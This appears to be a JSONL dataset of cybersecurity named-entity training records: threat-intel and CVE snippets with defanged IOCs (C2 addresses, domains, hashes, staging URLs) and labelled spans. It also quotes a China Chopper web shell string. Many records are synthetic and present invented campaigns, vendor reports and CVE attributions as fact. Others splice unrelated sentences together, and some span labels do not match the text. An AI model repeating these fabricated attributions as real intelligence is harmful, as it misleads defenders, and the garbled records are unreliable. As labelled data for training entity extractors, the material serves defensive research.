{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1938 W32[.]Virut[.]CF Win32/Virut.17408 PE_VIRUX.Q Win.Trojan.Virut-377 Virus.Win32.Virut.q Virus.Win32.Virut.hpeg W32.Virut.l5he Virus.Win32.Virut.Ce Win32.Virut.5 PE_VIRUX.Q Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus:Win32/Virut.BN Virus.Win32.Virut.q Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.DsBot W32/Virut.CE W32/Sality.AO Win32/Virus.VirutChangeEntry.H", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[96, 112]]}, "info": {"id": "cyner2_train_001902", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix node corruption in ar->arvifs list\n\nIn current WLAN recovery code flow, ath12k_core_halt() only reinitializes\nthe \"arvifs\" list head. This will cause the list node immediately following\nthe list head to become an invalid list node. Because the prev of that node\nstill points to the list head \"arvifs\", but the next of the list head\n\"arvifs\" no longer points to that list node.\n\nWhen a WLAN recovery occurs during the execution of a vif removal, and it\nhappens before the spin_lock_bh(&ar->data_lock) in\nath12k_mac_vdev_delete(), list_del() will detect the previously mentioned\nsituation, thereby triggering a kernel panic.\n\nThe fix is to remove and reinitialize all vif list nodes from the list head\n\"arvifs\" during WLAN halt. 
The reinitialization is to make the list nodes\nvalid, ensuring that the list_del() in ath12k_mac_vdev_delete() can execute\nnormally.\n\nCall trace:\n__list_del_entry_valid_or_report+0xd4/0x100 (P)\nath12k_mac_remove_link_interface.isra.0+0xf8/0x2e4 [ath12k]\nath12k_scan_vdev_clean_work+0x40/0x164 [ath12k]\ncfg80211_wiphy_work+0xfc/0x100\nprocess_one_work+0x164/0x2d0\nworker_thread+0x254/0x380\nkthread+0xfc/0x100\nret_from_fork+0x10/0x20\n\nThe change is mostly copied from the ath11k patch:\nhxxps://lore[ . ]kernel[ . ]org/all/20250320053145.3445187-1-quic_stonez@quicinc.com/\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1", "spans": {"Indicator: https://lore.kernel.org/all/20250320053145.3445187-1-quic_stonez@quicinc.com/": [[1297, 1382]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38290"}} {"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities . They also identified broadly similar TTPs being used in the attack against a U.S law firm specializing in intellectual property law . We also identified www[.]gokickes[.]com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": {"Organization: They": [[194, 198]], "Indicator: www.gokickes.com": [[347, 367]], "Malware: Invader variant": [[390, 405]], "Indicator: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[408, 472]]}, "info": {"id": "cyberner_stix_train_003620", "source": "defanged_augment"}} {"text": "Path – location of the root “ stash ” directory Ext – search for files with one of these extensions only Date – search for files not earlier than this date Internal name : NvCpld[.]dll ( from export table ) , msdetltemp[ . ]dll ( from resources ) , IGFSRVC[ . 
]dll ( from resources ) File format : PE32 DLL File size : 76,288 bytes MD5s : 8b238931a7f64fddcad3057a96855f6c , ce151285e8f0e7b2b90162ba171a4b90 Linker version : 11.0 , Microsoft Visual Studio Linker timestamps : 2015.05.29 11:20:32 ( GMT ) , 2006.11.25 04:39:15 ( GMT ) Exported functions :", "spans": {"Indicator: NvCpld.dll": [[172, 184]], "Indicator: msdetltemp.dll": [[209, 227]], "Indicator: IGFSRVC.dll": [[249, 264]], "Indicator: 8b238931a7f64fddcad3057a96855f6c": [[339, 371]], "Indicator: ce151285e8f0e7b2b90162ba171a4b90": [[374, 406]], "Organization: Microsoft": [[431, 440]]}, "info": {"id": "cyberner_stix_train_001866", "source": "defanged_augment"}} {"text": "Blog Post by Tenable: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-19363 against Microsoft Exchange deployments. The initial access vector involves spear-phishing emails from noreply@secure-verify[ . ]net delivering Conti. Post-compromise, the attackers deploy QakBot and use Hashcat for reconnaissance. C2 infrastructure includes 165 [ . ] 221 [ . ] 19 [ . ] 163 and auth-data[.]net. A staging server at hxxps://gateway-gateway[.]cc/callback hosts additional tooling. 
Key artifact: C:\\Users\\admin\\Downloads\\agent.py (SHA256: d8af6d83bde0ff03c5ed2671f598fa20dd0ac3a3b72d4c8c12bb3df461d4fd1d).", "spans": {"Organization: Tenable": [[13, 20]], "Vulnerability: CVE-2024-19363": [[124, 138]], "System: Microsoft Exchange": [[147, 165]], "Indicator: noreply@secure-verify.net": [[241, 270]], "Malware: Conti": [[282, 287]], "Malware: QakBot": [[327, 333]], "Indicator: 165.221.19.163": [[397, 429]], "Indicator: auth-data.net": [[434, 449]], "Indicator: https://gateway-gateway.cc/callback": [[471, 508]], "Indicator: d8af6d83bde0ff03c5ed2671f598fa20dd0ac3a3b72d4c8c12bb3df461d4fd1d": [[592, 656]]}, "info": {"id": "synth_v2_01507", "source": "defanged_augment"}} {"text": "Yet our statistics says that about 60 % of Android users are still sitting with Android 4.4.2 and below . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . The backdoor was delivered via a malicious [.]rtf file that exploited CVE-2017-0199 .", "spans": {"System: Android": [[43, 50]], "System: Android 4.4.2 and below": [[80, 103]], "Organization: Symantec": [[155, 163]], "Vulnerability: (CVE-2019-0703)": [[164, 179]], "Indicator: .rtf file": [[295, 306]], "Vulnerability: CVE-2017-0199": [[322, 335]]}, "info": {"id": "cyberner_stix_train_001198", "source": "defanged_augment"}} {"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at /home/user/.config/winlogon.exe - MD5: ad2253dd51db543d594e713e75cedeee\nStage 2 loader at C:\\Users\\admin\\Desktop\\dropper.ps1 - MD5: 7ed5841f11f87eed42aaf9f108a3ac3b\nFinal payload at /home/user/.config/agent.py - MD5: 06f949d97f49cf09adccd55b5df69fa4\nExfiltration module - SHA1: d02e72587a62f6b7bccc22985ae5833cb917ddea\nAll stages communicated with 60 [ . ] 100 [ . ] 107 [ . ] 211. 
Covenant signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: ad2253dd51db543d594e713e75cedeee": [[99, 131]], "Indicator: 7ed5841f11f87eed42aaf9f108a3ac3b": [[192, 224]], "Indicator: 06f949d97f49cf09adccd55b5df69fa4": [[277, 309]], "Indicator: d02e72587a62f6b7bccc22985ae5833cb917ddea": [[338, 378]], "Indicator: 60.100.107.211": [[408, 440]]}, "info": {"id": "synth_v2_01877", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Cobalt Strike (SHA256: ce61355c704f0b1b6de291d93d6b8191230b4adadc6fcb8c660e98acb3e344df). Upon execution on Apache Struts, the sample creates C:\\Users\\Public\\Documents\\config.dat and injects into legitimate processes. Network analysis shows beaconing to 192[.]150[.]190[.]159 every 60 seconds and DNS queries to securegateway[.]org. The second stage was fetched from hxxp://node-login[.]club/secure/token and written to C:\\Windows\\Temp\\beacon.dll. The payload uses SharpHound-style techniques for defense evasion. A secondary hash (SHA1: 11f2517e8b3be34112c61234c09bd4369494e438) was extracted from the unpacked payload.", "spans": {"Malware: Cobalt Strike": [[25, 38]], "Indicator: ce61355c704f0b1b6de291d93d6b8191230b4adadc6fcb8c660e98acb3e344df": [[48, 112]], "System: Apache Struts": [[133, 146]], "Indicator: 192.150.190.159": [[279, 300]], "Indicator: securegateway.org": [[337, 356]], "Indicator: hxxp://node-login.club/secure/token": [[392, 429]], "Indicator: 11f2517e8b3be34112c61234c09bd4369494e438": [[563, 603]]}, "info": {"id": "synth_v2_00496", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Zlob.60259 Trojan.NSIS.StartPage.Q Trojan.Zlob.60259 Win32/SillyDl.YHD Win.Trojan.NSIS-38 Trojan-Downloader[.]Win32[.]NSIS[.]io Trojan.Zlob.60259 Riskware.Nsis.Adw.cxexqq Troj.Downloader.W32.Lipler.lkqh Trojan.Zlob.60259 Trojan.Fakealert.26734 BehavesLike.Win32.AdwareSearchProtect.kc TrojanDownloader:Win32/Gabeerf.A Trojan.Zlob.DEB63 Trojan.Win32.Banker.140384 
Trojan.Zlob.60259 Trojan/Win32.StartPage.R26935 Trojan.NSIS", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan-Downloader.Win32.NSIS.io": [[123, 160]]}, "info": {"id": "cyner2_train_003060", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Emotet TSPY_EMOTET.SMZD172 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_EMOTET.SMZD172 Trojan.Packed2.40646 Trojan.Dovs.Win32.2068 BehavesLike[.]Win32[.]Backdoor[.]ch W32.Trojan.Emotet Trojan:Win32/Emotet.R!bit Trojan.Razy.D36CE4 Trojan/Win32.Emotet.R215266 Trojan.Win32.Emotet", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.ch": [[167, 202]]}, "info": {"id": "cyner2_train_002771", "source": "defanged_augment"}} {"text": "Malware code showing onCreate method Figure 9. onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string “ CuffGmrQRT ” as the first argument , which is the name of the encrypted file stored in the Assets folder . backdoors that now appear to be part of APT15 's toolset . It turns out that the first ZIP structure is for the image file order[ . ]jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf[ . ]exe . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"Indicator: order.jpg": [[460, 473]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[521, 559]], "Organization: Astamirov": [[562, 571]]}, "info": {"id": "cyberner_stix_train_001489", "source": "defanged_augment"}} {"text": "China Chopper web shell files named error404[ . 
]aspx included the \"eval (Request.Item[\"|\"] ,\"unsafe\" ) ; \" string .", "spans": {"Indicator: error404.aspx": [[36, 53]]}, "info": {"id": "cyberner_stix_train_007485", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed GhostPack artifacts at C:\\Users\\admin\\Desktop\\update.dll. Memory dump analysis confirmed execution of Sharphound. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\sam.hive. Network forensics identified connections to 10 [ . ] 39 [ . ] 235 [ . ] 90 and portal-relay[.]cc. Email headers traced the initial vector to hr@document-share[ . ]link. File C:\\Windows\\Temp\\runtime.dll (SHA1: 00b472a7ef475a63668c17948525561e7c369d96) was identified as the initial dropper. A staging URL hxxp://proxy-edge[ . ]site/panel/index.html resolved to 192 [ . ] 20 [ . ] 53 [ . ] 113. Secondary artifact hash: MD5: c48b4cf283597b4f25d38ba6bf4eff08.", "spans": {"Indicator: 10.39.235.90": [[316, 346]], "Indicator: portal-relay.cc": [[351, 368]], "Indicator: hr@document-share.link": [[413, 439]], "Indicator: 00b472a7ef475a63668c17948525561e7c369d96": [[481, 521]], "Indicator: hxxp://proxy-edge.site/panel/index.html": [[576, 619]], "Indicator: 192.20.53.113": [[632, 663]], "Indicator: c48b4cf283597b4f25d38ba6bf4eff08": [[695, 727]]}, "info": {"id": "synth_v2_01179", "source": "defanged_augment"}} {"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at /opt/app/bin/svchost.exe - SHA1: 8498928683e518848806498c06fd5f219ffa8f29\nStage 2 loader at C:\\Users\\admin\\Downloads\\agent.py - MD5: f777fb8697e4f3b539f80a75c6f3ec77\nFinal payload at C:\\Windows\\System32\\backdoor.elf - MD5: 65cd672c78f04296256846274558684b\nExfiltration module - SHA1: 1f075a3e3de862d313f97963563cf8a5997d98d2\nAll stages communicated with 10[.]191[.]91[.]59. 
Sliver signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: 8498928683e518848806498c06fd5f219ffa8f29": [[93, 133]], "Indicator: f777fb8697e4f3b539f80a75c6f3ec77": [[193, 225]], "Indicator: 65cd672c78f04296256846274558684b": [[283, 315]], "Indicator: 1f075a3e3de862d313f97963563cf8a5997d98d2": [[344, 384]], "Indicator: 10.191.91.59": [[414, 432]]}, "info": {"id": "synth_v2_01971", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan/Downloader.Delf.quw Win32.Trojan.WisdomEyes.16070401.9500.9770 Win.Trojan.Downloader-57555 Trojan.DownLoad2.37645 BehavesLike[.]Win32[.]PUPXAS[.]ch Trojan.Graftor.D1EFD7 TrojanDownloader:Win32/Blortios.C Trojan/Win32.Downloader.R18903 Win32/Trojan.88b", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PUPXAS.ch": [[147, 180]]}, "info": {"id": "cyner2_train_002164", "source": "defanged_augment"}} {"text": "Blog Post by Mandiant: Tracking BlackTech's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-10752 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from hr@account-update[.]xyz delivering Latrodectus. Post-compromise, the attackers deploy TrickBot and use Impacket for reconnaissance. C2 infrastructure includes 126[.]21[.]87[.]103 and edgeportal[.]live. A staging server at hxxps://cdnsync[.]info/api/v2/auth hosts additional tooling. 
Key artifact: /usr/local/bin/payload.bin (MD5: ccab949c2f8d2f57b2e0033abed3fd1e).", "spans": {"Organization: Mandiant": [[13, 21]], "Vulnerability: CVE-2026-10752": [[121, 135]], "System: Atlassian Confluence": [[144, 164]], "Indicator: hr@account-update.xyz": [[240, 263]], "Malware: Latrodectus": [[275, 286]], "Malware: TrickBot": [[326, 334]], "Indicator: 126.21.87.103": [[399, 418]], "Indicator: edgeportal.live": [[423, 440]], "Indicator: https://cdnsync.info/api/v2/auth": [[462, 496]], "Indicator: ccab949c2f8d2f57b2e0033abed3fd1e": [[570, 602]]}, "info": {"id": "synth_v2_01637", "source": "defanged_augment"}} {"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA . This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp[ . ]exe . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"Indicator: csidl_profile\\appdata\\roaming\\adobe\\ftp.exe": [[364, 411]]}, "info": {"id": "cyberner_stix_train_005991", "source": "defanged_augment"}} {"text": "Blog Post by Huntress: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-19144 against Ubuntu 22.04 deployments. The initial access vector involves spear-phishing emails from ceo@login-portal[ . ]tech delivering SmokeLoader. Post-compromise, the attackers deploy NjRAT and use LaZagne for reconnaissance. C2 infrastructure includes 109 [ . ] 81 [ . ] 57 [ . ] 51 and gatewayapi[ . ]site. A staging server at hxxp://portalapi[ . ]tech/assets/js/payload.js hosts additional tooling. 
Key artifact: C:\\Windows\\System32\\payload.bin (MD5: da530bbbb0018619e5581fe65b72dc5a).", "spans": {"Organization: Huntress": [[13, 21]], "Vulnerability: CVE-2020-19144": [[124, 138]], "System: Ubuntu 22.04": [[147, 159]], "Indicator: ceo@login-portal.tech": [[235, 260]], "Malware: SmokeLoader": [[272, 283]], "Malware: NjRAT": [[323, 328]], "Indicator: 109.81.57.51": [[392, 422]], "Indicator: gatewayapi.site": [[427, 446]], "Indicator: hxxp://portalapi.tech/assets/js/payload.js": [[468, 514]], "Indicator: da530bbbb0018619e5581fe65b72dc5a": [[593, 625]]}, "info": {"id": "synth_v2_01504", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Gootloader (MD5: 0fa957d45d185b9ead181417bbe49afc). Upon execution on Cisco ASA, the sample creates C:\\Windows\\System32\\shell.php and injects into legitimate processes. Network analysis shows beaconing to 10 [ . ] 108 [ . ] 155 [ . ] 38 every 60 seconds and DNS queries to sync-mail[ . ]club. The second stage was fetched from hxxp://proxystatic[.]dev/secure/token and written to /opt/app/bin/loader.exe. The payload uses Chisel-style techniques for defense evasion. A secondary hash (MD5: b9980573972767191297fb77de215e3d) was extracted from the unpacked payload.", "spans": {"Malware: Gootloader": [[25, 35]], "Indicator: 0fa957d45d185b9ead181417bbe49afc": [[42, 74]], "System: Cisco ASA": [[95, 104]], "Indicator: 10.108.155.38": [[230, 261]], "Indicator: sync-mail.club": [[298, 316]], "Indicator: hxxp://proxystatic.dev/secure/token": [[352, 389]], "Indicator: b9980573972767191297fb77de215e3d": [[515, 547]]}, "info": {"id": "synth_v2_00476", "source": "defanged_augment"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online[.]bankaustria[.]at.id87721 [ . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . 
APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": {"Organization: Russia's Main Intelligence Directorate of the Russian General Staff": [[267, 334]], "Organization: U.S. Department of Justice": [[350, 376]], "Indicator: online.bankaustria.at": [[30, 55]]}, "info": {"id": "cyberner_stix_train_007071", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-27546 is a critical CSRF vulnerability affecting Zyxel USG. FireEye confirmed active exploitation by APT28 in the wild. Exploitation delivers DarkSide (SHA1: 9d45cb8714ddb217127203a99a9d34e8ecc69384) which is dropped to C:\\Windows\\Tasks\\agent.py. The exploit payload is hosted at hxxp://gateway-portal[ . ]tech/panel/index.html and communicates to 10 [ . ] 109 [ . ] 18 [ . ] 76 for C2.", "spans": {"Vulnerability: CVE-2024-27546": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: Zyxel USG": [[82, 91]], "Organization: FireEye": [[93, 100]], "Malware: DarkSide": [[175, 183]], "Indicator: 9d45cb8714ddb217127203a99a9d34e8ecc69384": [[191, 231]], "Indicator: hxxp://gateway-portal.tech/panel/index.html": [[313, 360]], "Indicator: 10.109.18.76": [[381, 411]]}, "info": {"id": "synth_v2_00719", "source": "defanged_augment"}} {"text": "Artifact Analysis for Vidar campaign:\nStage 1 dropper at /usr/local/bin/helper.sh - MD5: 07f736a1593ac1ad8eb9c3ce52fb15de\nStage 2 loader at /dev/shm/ntds.dit - SHA1: c3cddbb88cd35ac6f32ca267d773962a262bc475\nFinal payload at /tmp/ntds.dit - SHA1: 0a9336c606e9a3158a2bd171c55682923ea825ba\nExfiltration module - SHA1: 0a82c2bda4cb8dba6d94974fb7370f24e5412951\nAll stages communicated with 25[.]39[.]236[.]208. 
Rubeus signatures detected in Stage 2.", "spans": {"Malware: Vidar": [[22, 27]], "Indicator: 07f736a1593ac1ad8eb9c3ce52fb15de": [[89, 121]], "Indicator: c3cddbb88cd35ac6f32ca267d773962a262bc475": [[166, 206]], "Indicator: 0a9336c606e9a3158a2bd171c55682923ea825ba": [[246, 286]], "Indicator: 0a82c2bda4cb8dba6d94974fb7370f24e5412951": [[315, 355]], "Indicator: 25.39.236.208": [[385, 404]]}, "info": {"id": "synth_v2_01867", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5 [ . ] 5 [ . ] 0 [ . ] 0.0, 12 [ . ] 2 [ . ] 1 [ . ] 3.0 and 12 [ . ] 2 [ . ] 1 [ . ] 4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 5.5.0.0": [[178, 203]], "Indicator: 12.2.1.3": [[207, 233]], "Indicator: 12.2.1.4": [[240, 266]], "Organization: Oracle": [[21, 27], [80, 86], [377, 383], [543, 549], [757, 763], [872, 878]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-2191"}} {"text": "Malware Analysis Report: Latrodectus (MD5: 92d82a0eaa8956ed8b6e0f15d703680a). 
Upon execution on SonicWall SMA, the sample creates /home/user/.config/payload.bin and injects into legitimate processes. Network analysis shows beaconing to 192[.]175[.]134[.]17 every 60 seconds and DNS queries to gatewayupdate[.]io. The second stage was fetched from hxxps://auth-data[ . ]online/api/v2/auth and written to /etc/cron.d/agent.py. The payload uses Brute Ratel-style techniques for defense evasion. A secondary hash (SHA1: 9c990507e7d51e1b1122226c0cc41b47df3af991) was extracted from the unpacked payload.", "spans": {"Malware: Latrodectus": [[25, 36]], "Indicator: 92d82a0eaa8956ed8b6e0f15d703680a": [[43, 75]], "System: SonicWall SMA": [[96, 109]], "Indicator: 192.175.134.17": [[236, 256]], "Indicator: gatewayupdate.io": [[293, 311]], "Indicator: hxxps://auth-data.online/api/v2/auth": [[347, 387]], "Indicator: 9c990507e7d51e1b1122226c0cc41b47df3af991": [[516, 556]]}, "info": {"id": "synth_v2_00502", "source": "defanged_augment"}} {"text": "Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.", "spans": {"Indicator: https://github.com/CachetHQ/Cachet": [[347, 383]], "Vulnerability: SQL injection": [[92, 105]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-39165"}} {"text": "] com , points to the IP address 54[.]69[.]156[.]31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 . 
Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice[.]exe . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"Indicator: C:\\ProgramData\\IntegratedOffice.exe": [[427, 464]], "Malware: OT malware": [[496, 506]], "Indicator: 54.69.156.31": [[33, 51]]}, "info": {"id": "cyberner_stix_train_004169", "source": "defanged_augment"}} {"text": "We detonated the file in VxStream ’s automated malware analysis capability and found testproj[ . ]exe dropped a benign Microsoft Word document that pulls a jpg file from treestower[.]com .", "spans": {"Indicator: testproj.exe": [[85, 101]], "Organization: Microsoft": [[119, 128]], "Indicator: treestower.com": [[170, 186]]}, "info": {"id": "cyberner_stix_train_006782", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: tcp: ipv4, fix incorrect labeling\n\nCurrently, Smack mirrors the label of incoming tcp/ipv4 connections:\nwhen a label 'foo' connects to a label 'bar' with tcp/ipv4,\n'foo' always gets 'foo' in returned ipv4 packets. 
So,\n1) returned packets are incorrectly labeled ('foo' instead of 'bar')\n2) 'bar' can write to 'foo' without being authorized to write.\n\nHere is a scenario how to see this:\n\n* Take two machines, let's call them C and S,\n with active Smack in the default state\n (no settings, no rules, no labeled hosts, only builtin labels)\n\n* At S, add Smack rule 'foo bar w'\n (labels 'foo' and 'bar' are instantiated at S at this moment)\n\n* At S, at label 'bar', launch a program\n that listens for incoming tcp/ipv4 connections\n\n* From C, at label 'foo', connect to the listener at S.\n (label 'foo' is instantiated at C at this moment)\n Connection succeedes and works.\n\n* Send some data in both directions.\n* Collect network traffic of this connection.\n\nAll packets in both directions are labeled with the CIPSO\nof the label 'foo'. Hence, label 'bar' writes to 'foo' without\nbeing authorized, and even without ever being known at C.\n\nIf anybody cares: exactly the same happens with DCCP.\n\nThis behavior 1st manifested in release 2[.]6[.]29[.]4 (see Fixes below)\nand it looks unintentional. At least, no explanation was provided.\n\nI changed returned packes label into the 'bar',\nto bring it into line with the Smack documentation claims.", "spans": {"Indicator: 2.6.29.4": [[1316, 1330]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-47659"}} {"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk . 
It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel . The injected code calls out a first domain ( seen above encoded in Base64 ) and generates a Base64 response : Decoding it reveals a URL pointing to the actual skimming code , which is heavily obfuscated ( likely via obfuscator[ . ]io ): The data exfiltration is also done differently as seen in the image below .", "spans": {"Organization: computer utilities": [[465, 483]], "Organization: WinUtils": [[496, 504]], "Organization: TrueCrypt": [[507, 516]], "Organization: WinRAR": [[519, 525]], "Organization: SanDisk": [[531, 538]], "Indicator: obfuscator.io": [[894, 911]]}, "info": {"id": "cyberner_stix_train_001859", "source": "defanged_augment"}} {"text": "Europol published a threat intelligence report linking Kimsuky to a new campaign exploiting CVE-2026-44676 in Atlassian Confluence. The attackers deployed Hive via LinPEAS, establishing C2 communication with 33 [ . ] 120 [ . ] 51 [ . ] 73 and staticbackup[ . ]club. A secondary payload was downloaded from hxxps://cache-cache[.]tech/callback. The malware binary (SHA256: 4c92d14cbaaa3222a41a0622e72512b5a2e953bc1469e6c46bc6c22ff073bbff) was dropped to C:\\Windows\\Temp\\winlogon.exe. Phishing emails were sent from helpdesk@login-portal[.]tech targeting enterprise users. A backup C2 server was identified at 10 [ . ] 162 [ . ] 248 [ . 
] 116.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2026-44676": [[92, 106]], "System: Atlassian Confluence": [[110, 130]], "Malware: Hive": [[155, 159]], "Indicator: 33.120.51.73": [[208, 238]], "Indicator: staticbackup.club": [[243, 264]], "Indicator: https://cache-cache.tech/callback": [[306, 341]], "Indicator: 4c92d14cbaaa3222a41a0622e72512b5a2e953bc1469e6c46bc6c22ff073bbff": [[371, 435]], "Indicator: helpdesk@login-portal.tech": [[513, 541]], "Indicator: 10.162.248.116": [[607, 639]]}, "info": {"id": "synth_v2_00152", "source": "defanged_augment"}} {"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32[ . ]tsp ' that provides remote control , belonging to this category .", "spans": {"Malware: DarkPulsar": [[156, 166]], "Malware: backdoor": [[237, 245]], "Indicator: sipauth32.tsp": [[254, 271]]}, "info": {"id": "cyberner_stix_train_001600", "source": "defanged_augment"}} {"text": "Exploitation of CVE-2021-21972 was attributed to APT29 targeting Windows 11 instances. The exploit payload was served from 179[.]152[.]145[.]170 and communicated with cdn-delivery[[.]]xyz for command-and-control. 
Post-exploitation, a webshell (SHA256: 92376589330387034357d5813804d154b6a63c47dd17e2d78055be3fc0bb95bb) was deployed to /home/www-data/.ssh/authorized_keys2.", "spans": {"Vulnerability: CVE-2021-21972": [[16, 30]], "System: Windows 11": [[65, 75]], "Indicator: 179.152.145.170": [[123, 144]], "Indicator: cdn-delivery[.]xyz": [[167, 187]], "Indicator: 92376589330387034357d5813804d154b6a63c47dd17e2d78055be3fc0bb95bb": [[252, 316]]}, "info": {"id": "synth_00080", "source": "defanged_augment"}} {"text": "RemcosRAT executable (SHA256: 667b71e6f8389bf64ec8db65407fec3a449f055d6be8e1e27763532489f68ce2, MD5: d4302d76d91af8bc39ef48d8a2f7ba86) was identified by threatcat_ch. RemcosRAT is a commercial remote administration tool commonly abused by threat actors. This sample connects to remcos-panel[ . ]zapto[ . ]org:4782 for command and control, and exfiltrates stolen data to ftp://upload[.]malicioushost[.]ru/drops/.", "spans": {"Malware: RemcosRAT": [[0, 9], [167, 176]], "Indicator: 667b71e6f8389bf64ec8db65407fec3a449f055d6be8e1e27763532489f68ce2": [[30, 94]], "Indicator: d4302d76d91af8bc39ef48d8a2f7ba86": [[101, 133]], "Indicator: remcos-panel.zapto.org": [[278, 308]], "Indicator: ftp://upload.malicioushost.ru/drops/": [[370, 410]]}, "info": {"id": "otx_00010", "source": "defanged_augment"}} {"text": "Additional SideWinder C2 domains discovered by Kaspersky include modpak-info[ . ]services, pmd-offc[.]info, dirctt888[ . ]com, mods[.]email, dowmload[ . ]co, downl0ad[.]org, d0wnlaod[ . ]org, dirctt88[.]info, directt88[ . ]com, aliyum[ . ]email, d0cumentview[ . ]info, debcon[ . ]live, document-viewer[ . ]live, documentviewer[.]info, ms-office[ . ]pro, pncert[.]info, session-out[ . ]com, ziptec[.]info, depo-govpk[ . ]com, crontec[ . ]site, mteron[.]info, mevron[ . ]tech, and veorey[.]live. 
